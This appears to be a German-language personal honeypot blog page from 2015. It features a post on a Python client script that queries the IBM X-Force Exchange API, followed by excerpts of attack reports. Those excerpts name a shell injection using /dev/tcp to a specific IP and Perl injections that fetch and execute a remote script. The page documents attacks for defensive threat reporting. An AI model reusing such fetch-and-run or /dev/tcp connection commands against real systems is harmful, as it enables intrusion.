Meine Blog-Liste

  • end of life - Good morning, as you may have already found out, the posts on this blog have been getting less and less. This is caused by the fact that my two honeypots h...
    vor 11 Monaten

Donnerstag, 25. Juni 2015

IBM Xforce Exchange - my client script

As some of you may know, my SendMeSpamIDS includes a script to check data against the IBM XForce Exchange api.


As this script was hidden within a sub folder, I decided to create a standalone github project out of it:


Usage: XFupload.py [options]
Options:
  -h, --help            show this help message and exit
  -u scanurl, --url=scanurl
                        URL to be checked by Exchange IBM Xforce
  -m scanurl, --malware=scanurl
                        Malware to be checked by Exchange IBM Xforce
  -f filename, --file=filename
                        file (md5 hash) to be checked by Exchange IBM Xfo
  -x xfid, --xfid=xfid  XFID to be used
  -c cve-xxx-xxx, --cve=cve-xxx-xxx
                        CVE, BID, US-Cert, UV#, RHSA id to be searched
 From time to time I add improvements to this script, so stay tuned for changes.

The script was developed and tested on:
  • Windows 7 Pro (including Visual Studio + Python)
  • Ubuntu and Debian
  • Raspberry Pi with Debian

Donnerstag, 18. Juni 2015

SendMeSpam: Shellinjection attack: /dev/tcp/74.208.79.34/21 --...

SendMeSpam: Shellinjection attack: /dev/tcp/74.208.79.34/21 --...: My Honeypot was attacked by Jun 18 06:42:08 beeswarm [mypyfwa] 2015-06-18 06:42:08.029145 213.165.70.245 - - [17/Jun/2015:16:11:21 +0200] ...

Montag, 15. Juni 2015

SendMeSpam: JST IrcBot revisited

SendMeSpam: JST IrcBot revisited: Maybe you remember the shellinjection I reported yesterday. This morning I took the time to read a bit through the code  JST Perl IrcBot...

Sonntag, 14. Juni 2015

SendMeSpam: JST IrcBot revisited

SendMeSpam: JST IrcBot revisited: Maybe you remember the shellinjection I reported yesterday. This morning I took the time to read a bit through the code  JST Perl IrcBot...

SendMeSpam: Perl script injection: 85.214.60.234/den

SendMeSpam: Perl script injection: 85.214.60.234/den: The last two days several Shell injections have hit my Honeypot. Any of them tried to download a prscript and execute it Jun 13 06:42:11 ...